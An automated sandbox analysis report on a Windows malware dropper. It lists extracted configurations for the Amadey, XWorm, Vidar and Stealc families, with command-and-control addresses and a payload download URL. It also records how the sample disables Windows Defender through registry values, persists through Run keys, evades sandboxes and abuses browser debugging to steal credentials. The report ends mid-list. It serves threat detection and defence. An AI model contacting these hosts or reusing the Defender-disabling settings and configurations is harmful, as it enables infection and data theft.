Analysis
-
max time kernel
84s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250313-en -
resource tags
arch:x64arch:x86image:win10v2004-20250313-enlocale:en-usos:windows10-2004-x64system -
submitted
27/03/2025, 07:12
Static task
static1
Behavioral task
behavioral1
Sample
c6d53119ad485eb2f814e3a70307deba2e9b9a7635a774256a03cecbfff6f13e.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
c6d53119ad485eb2f814e3a70307deba2e9b9a7635a774256a03cecbfff6f13e.exe
Resource
win10v2004-20250313-en
General
-
Target
c6d53119ad485eb2f814e3a70307deba2e9b9a7635a774256a03cecbfff6f13e.exe
-
Size
1.9MB
-
MD5
c9e35f3be0a99258747eee4b2bef19f2
-
SHA1
ba70a487a2da7acb8cfc4a761a4dd8b095cdcb59
-
SHA256
c6d53119ad485eb2f814e3a70307deba2e9b9a7635a774256a03cecbfff6f13e
-
SHA512
8e417bf09007f65fd96c8ec31b212e7069f3f74c1bdaf08ec41da0edd5b15c453396f12c815d20058ff37d05bb9a2fa8ba527f3977112f00b864995d9ff42d6e
-
SSDEEP
24576:pZlgrTXxqn0airby/O/D9SsVkl8UxjgpLLyn2o+HlmzQJ57IwHC6iPlHi9a2Mi:pHg3XcerO/O7jk6Ux2/o+Hdb9HGO2
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
xworm
5.0
b.strongest.network:22394
g0tzhJeA9KqJ5VDD
-
Install_directory
%AppData%
-
install_file
MsWin32tart.exe
Extracted
vidar
13.3
70790cf457f5ee5e9df1780bfa648812
https://t.me/lw25chm
https://steamcommunity.com/profiles/76561199839170361
-
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Signatures
-
Amadey family
-
Detect Vidar Stealer 30 IoCs
resource yara_rule behavioral2/memory/4380-131-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4380-132-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4380-140-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4380-141-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4380-146-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4380-147-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4380-150-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4380-172-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4380-173-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4380-177-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4380-181-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4380-195-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4380-299-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4380-312-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4380-311-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4380-313-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4380-316-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4380-331-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4380-332-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4380-334-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4380-338-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4380-342-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4380-1723-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4380-1775-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4380-1772-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4380-1878-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4380-1896-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4380-1989-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4380-2123-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4380-2196-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 -
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral2/files/0x0009000000024257-95.dat family_xworm behavioral2/memory/3076-108-0x0000000000690000-0x00000000006BE000-memory.dmp family_xworm -
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral2/memory/4460-1026-0x0000000000940000-0x0000000000D88000-memory.dmp healer behavioral2/memory/4460-1028-0x0000000000940000-0x0000000000D88000-memory.dmp healer behavioral2/memory/4460-1436-0x0000000000940000-0x0000000000D88000-memory.dmp healer -
Healer family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" ad8094dd16.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" ad8094dd16.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" ad8094dd16.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" ad8094dd16.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" ad8094dd16.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" ad8094dd16.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection ad8094dd16.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" ad8094dd16.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications ad8094dd16.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" ad8094dd16.exe -
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters reg.exe -
Stealc family
-
Vidar family
-
Xworm family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 10 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ c6d53119ad485eb2f814e3a70307deba2e9b9a7635a774256a03cecbfff6f13e.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempZN9H2EWPPWIJPIP7WZNHNSGJRMLNZA9H.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 108394fe3e.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 49d4f8aa60.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 563e9e5edc.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ad8094dd16.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 92 3464 powershell.exe 244 5912 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3680 powershell.exe 5912 powershell.exe 3464 powershell.exe 6084 powershell.exe 3504 powershell.exe 436 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 12 IoCs
flow pid Process 27 4064 rapes.exe 27 4064 rapes.exe 27 4064 rapes.exe 27 4064 rapes.exe 27 4064 rapes.exe 27 4064 rapes.exe 82 4064 rapes.exe 266 4064 rapes.exe 352 4064 rapes.exe 241 4064 rapes.exe 92 3464 powershell.exe 244 5912 powershell.exe -
Possible privilege escalation attempt 2 IoCs
pid Process 4092 takeown.exe 3484 icacls.exe -
Stops running service(s) 4 TTPs
-
Uses browser remote debugging 2 TTPs 17 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 3088 chrome.exe 4688 chrome.exe 7116 msedge.exe 6768 chrome.exe 5516 chrome.exe 5160 chrome.exe 2272 chrome.exe 5068 msedge.exe 7148 msedge.exe 2656 chrome.exe 5292 msedge.exe 3852 msedge.exe 7124 msedge.exe 3544 msedge.exe 6788 chrome.exe 4220 chrome.exe 5756 chrome.exe -
Checks BIOS information in registry 2 TTPs 20 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion c6d53119ad485eb2f814e3a70307deba2e9b9a7635a774256a03cecbfff6f13e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 563e9e5edc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ad8094dd16.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempZN9H2EWPPWIJPIP7WZNHNSGJRMLNZA9H.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 563e9e5edc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 49d4f8aa60.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 108394fe3e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ad8094dd16.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 49d4f8aa60.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion c6d53119ad485eb2f814e3a70307deba2e9b9a7635a774256a03cecbfff6f13e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempZN9H2EWPPWIJPIP7WZNHNSGJRMLNZA9H.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 108394fe3e.exe -
Checks computer location settings 2 TTPs 9 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation c6d53119ad485eb2f814e3a70307deba2e9b9a7635a774256a03cecbfff6f13e.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation 22.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation FjbTOQC.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation WLbfHbp.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation apple.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation 22.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation mshta.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MsWin32tart.lnk FjbTOQC.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MsWin32tart.lnk FjbTOQC.exe -
Executes dropped EXE 22 IoCs
pid Process 4064 rapes.exe 224 oalJJxv.exe 3756 rapes.exe 2636 apple.exe 5536 22.exe 1672 22.exe 1772 EPTwCQd.exe 3076 FjbTOQC.exe 1680 MsWin32tart.exe 4904 q4jfn3p.exe 2580 3e34f7cf67.exe 5484 TempZN9H2EWPPWIJPIP7WZNHNSGJRMLNZA9H.EXE 1272 0fbec82655.exe 4456 108394fe3e.exe 6428 563e9e5edc.exe 6876 483d2fa8a0d53818306efeb32d3.exe 6880 c42b585dc6.exe 4460 ad8094dd16.exe 2660 rapes.exe 5764 MsWin32tart.exe 4148 49d4f8aa60.exe 752 WLbfHbp.exe -
Identifies Wine through registry keys 2 TTPs 10 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine 49d4f8aa60.exe Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine c6d53119ad485eb2f814e3a70307deba2e9b9a7635a774256a03cecbfff6f13e.exe Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine 563e9e5edc.exe Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine TempZN9H2EWPPWIJPIP7WZNHNSGJRMLNZA9H.EXE Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine 108394fe3e.exe Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine ad8094dd16.exe -
Modifies file permissions 1 TTPs 2 IoCs
pid Process 4092 takeown.exe 3484 icacls.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features ad8094dd16.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" ad8094dd16.exe -
Adds Run key to start application 2 TTPs 7 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MsWin32tart = "C:\\Users\\Admin\\AppData\\Roaming\\MsWin32tart.exe" FjbTOQC.exe Set value (str) \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\3e34f7cf67.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10348030101\\3e34f7cf67.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10348040121\\am_no.cmd" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\108394fe3e.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10348240101\\108394fe3e.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\563e9e5edc.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10348250101\\563e9e5edc.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c42b585dc6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10348260101\\c42b585dc6.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ad8094dd16.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10348270101\\ad8094dd16.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x000a00000001680d-155.dat autoit_exe behavioral2/files/0x0002000000023165-969.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 3 IoCs
pid Process 6812 tasklist.exe 752 tasklist.exe 3536 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
pid Process 5672 c6d53119ad485eb2f814e3a70307deba2e9b9a7635a774256a03cecbfff6f13e.exe 4064 rapes.exe 3756 rapes.exe 5484 TempZN9H2EWPPWIJPIP7WZNHNSGJRMLNZA9H.EXE 4456 108394fe3e.exe 6428 563e9e5edc.exe 6876 483d2fa8a0d53818306efeb32d3.exe 4460 ad8094dd16.exe 2660 rapes.exe 4148 49d4f8aa60.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 1772 set thread context of 2272 1772 EPTwCQd.exe 169 PID 4904 set thread context of 4380 4904 q4jfn3p.exe 179 PID 1272 set thread context of 5604 1272 0fbec82655.exe 213 -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\uk-UA\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui cmd.exe -
Drops file in Windows directory 10 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job c6d53119ad485eb2f814e3a70307deba2e9b9a7635a774256a03cecbfff6f13e.exe File opened for modification C:\Windows\VeryBulk WLbfHbp.exe File opened for modification C:\Windows\FinancingPortable WLbfHbp.exe File opened for modification C:\Windows\ThoseTransit WLbfHbp.exe File opened for modification C:\Windows\MandateFlashing WLbfHbp.exe File opened for modification C:\Windows\IstRepresentative WLbfHbp.exe File opened for modification C:\Windows\AdministratorNhs WLbfHbp.exe File opened for modification C:\Windows\ThinksMartin WLbfHbp.exe File opened for modification C:\Windows\SinghCooling WLbfHbp.exe File opened for modification C:\Windows\DollStriking WLbfHbp.exe -
Launches sc.exe 38 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2936 sc.exe 2448 sc.exe 4220 sc.exe 736 sc.exe 972 sc.exe 6068 sc.exe 3188 sc.exe 5720 sc.exe 5196 sc.exe 2908 sc.exe 4308 sc.exe 5628 sc.exe 1948 sc.exe 3308 sc.exe 2788 sc.exe 3984 sc.exe 5136 sc.exe 5868 sc.exe 1920 sc.exe 5936 sc.exe 6084 sc.exe 1716 sc.exe 2220 sc.exe 5928 sc.exe 4608 sc.exe 5800 sc.exe 3976 sc.exe 1812 sc.exe 5732 sc.exe 5268 sc.exe 5724 sc.exe 6056 sc.exe 1456 sc.exe 1020 sc.exe 5016 sc.exe 2248 sc.exe 916 sc.exe 5264 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 11568 3900 WerFault.exe 296 -
System Location Discovery: System Language Discovery 1 TTPs 40 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ad8094dd16.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language oalJJxv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 108394fe3e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 22.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempZN9H2EWPPWIJPIP7WZNHNSGJRMLNZA9H.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened 